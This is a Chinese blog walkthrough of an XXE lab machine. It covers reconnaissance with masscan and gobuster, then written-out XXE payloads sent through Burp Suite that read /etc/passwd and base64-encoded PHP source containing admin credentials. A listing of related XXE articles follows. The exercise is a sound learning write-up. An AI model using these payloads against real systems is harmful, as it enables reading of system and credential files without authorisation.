P4 利用XXE靶机 -XXE(XML外部实体注入漏洞)复现

最新推荐文章于 2024-04-16 16:15:27 发布
最新推荐文章于 2024-04-16 16:15:27 发布
阅读量546 收藏 2
点赞数 1
分类专栏: # 漏洞复现 文章标签: xml 安全漏洞 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44519789/article/details/115097299
版权

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
今天更新的是:

创建时间:2021年3月22日
软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、XXE靶机

XXE漏洞复现

环境准备

  • kali配置
  1. 安装masscan : apt-get install masscan
  2. 安装gobuster: apt-get install gobuster
  3. 安装字典:apt-get install seclists
  • 利用masscan 扫描当前端口局域网内存活主机:masscan -p80 192.168.244.0/24
  • 模板:masscan -p扫描端口号 ip地址网段/24

在这里插入图片描述

  • 扫描ip地址下面的目录 :gobuster dir -u http://192.168.244.136 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20
  • 模板:gobuster dir -u IP地址 -w 存放的字典 -t 运行的线程数
  • 可以查看到当前IP地址下可以访问的目录

在这里插入图片描述

  • 打开 http://192.168.244.136/robots.txt 可以查看到一个隐藏文件admin.php
  • 浏览器打开 IP地址 :80 /想要访问的目录

在这里插入图片描述

  • 浏览器打开刚才我们找到的隐藏文件 http://192.168.244.136/xxe/admin.php可以看得出这是一个后台界面

-

  • 我们在浏览器打开XXE登录界面:http://192.168.244.136/xxe/

在这里插入图片描述

  • 我们打开Burp Suite 随意输入用户名和密码进行登录的抓包,来查看抓包文件。
  • 将抓取到的数据包发送到 Repeater 来进行分析

在这里插入图片描述
在这里插入图片描述

  • 修改抓到的数据包中的XML内容,使其返回 file:///etc/passwd 的内容
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>

在这里插入图片描述

  • 继续在数据包中修改XML代码,尝试获取到账户名和账户密码
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>

在这里插入图片描述

  • 将右侧返回的 base 64位编码进行反编译得到关于密码的md5串
  • 将右侧的base 64位编码复制发送到Decoder中尝试去反编译

在这里插入图片描述

  • 检查代码,我们发现账户名为:administhebest ,密码为:MD5编码串

在这里插入图片描述

  • 打开在线MD5编码串进行解析,得到密码 、密码为:admin@123

在这里插入图片描述

  • 拿到账户和密码之后,登录我们之前发现的后台登录界面、登录成功之后拿到Flag

在这里插入图片描述

  • 下面就属于玄学操作了 !!!!
  • 正常情况下,直接点击界面上的Flag 就可以得到Flag
  • 因为我得到过一次,我再次重复操作发现爆404错误、没关系我们可以尝试利用抓包来实现,将点击Flag 跳转的界面的后缀文件放到抓包文件中去进行替换然后重新发送得到base64位编码发送到Docker进行转换得到Flag

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 将得到的Flag 进行base32 位转码得到base64位,再次进行转换得到文件路径

-
在这里插入图片描述

  • 将得到的文件路径放到之前抓取的登录文件数据包中再次发送
  • 将得到的base64位编码进行转换
  • 将转换得到的数据(木马),复制下来新建php文件。
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>

在这里插入图片描述
在这里插入图片描述

  • 放到存放PHPStudy文件夹下,进行访问http://127.0.0.1/1.php
  • 模板:IP地址 / 文件名称.php
  • 复现成功

在这里插入图片描述

走过路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
在这里插入图片描述

把握现在 ,展望未来 ,加油 !

由于水平有限 ,写的难免会有些不足之处 ,恳请各位大佬不吝赐教 !

在下小黄
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
xxe靶机漏洞复现
千寻的博客
05-25 1250
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5279
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
网络安全XXE漏洞复现及防御(上篇)(技术进阶)
最新发布
weixin_70911257的博客
04-16 1155
xxe漏洞复现
XXE外部实体注入漏洞 学习笔记
qq_37019068的博客
10-12 1754
1. 前置知识——XML 与 DTD 名词解释 XML:指可扩展标记语言(eXtensible Markup Language)。被设计用来传输和存储数据,形似HTML,但是与其不同的是HTML被设计用于展示数据 DTD:文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD可被成行地声明于 XML 文档中,也可作为一个外部引用。 DTD可被内部引用,也可以被外部引用 举例 XML内部引入DTD,即将约束规则限定在xml文档中 <?xml ve
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5764
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
[渗透测试学习靶机06] vulnhub 靶场 XXE Lab 1
weixin_47112073的博客
10-23 570
网上看到了好多xxe靶机通关的文章,但是没人写为什么可以实现文件读取,为什么是XXE漏洞,我在这里简单写一下,一来方便自己以后看,二来对还没有接触过xxe漏洞的朋友来说也比较友好
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
WEB安全XXE实体注入漏洞.pdf
12-12
WEB安全XXE实体注入漏洞
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的产生是因为 XML 解析器对外部实体的处理不当。攻击者可以构造恶意的 XML 文档,使得服务器将任意文件读取出来。这种攻击方式称为 XXE Injection。XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制等恶意行为。 在本节课程中,我们将讨论XXE漏洞利用方法,特别是任意文件读取的实现。...
pikachu之XXE漏洞
weixin_46062722的博客
02-25 643
漏洞介绍 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里
利用 XML 外部实体注入
m0_73630977的博客
06-21 136
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
XXE漏洞
热门推荐
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXEXML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
XXE靶机
haha1314的博客
08-10 685
一、 收集信息 存活主机 开放端口 存在注入 Post包里面添加 <?xml version=“1.0″ encoding=“UTF-8″?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <root><n...
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6416
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
Apache solr XML 实体注入漏洞(CVE-2017-12629)
EC_Carrot的博客
07-29 483
漏洞简介 Apache Solr 是一个开源的搜索服务器。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 参考了这位大佬的文章:https://www.cnblogs.com/cute-puli/p/13340249.html 漏洞复现 复现这个漏洞需要搭建一个http,我这里用的python3 -m http.server 8000 然后在该网站目录下创建一个.dtd文件,内容为: <!E
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

在下小黄

ღ给个赞 是对小黄最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值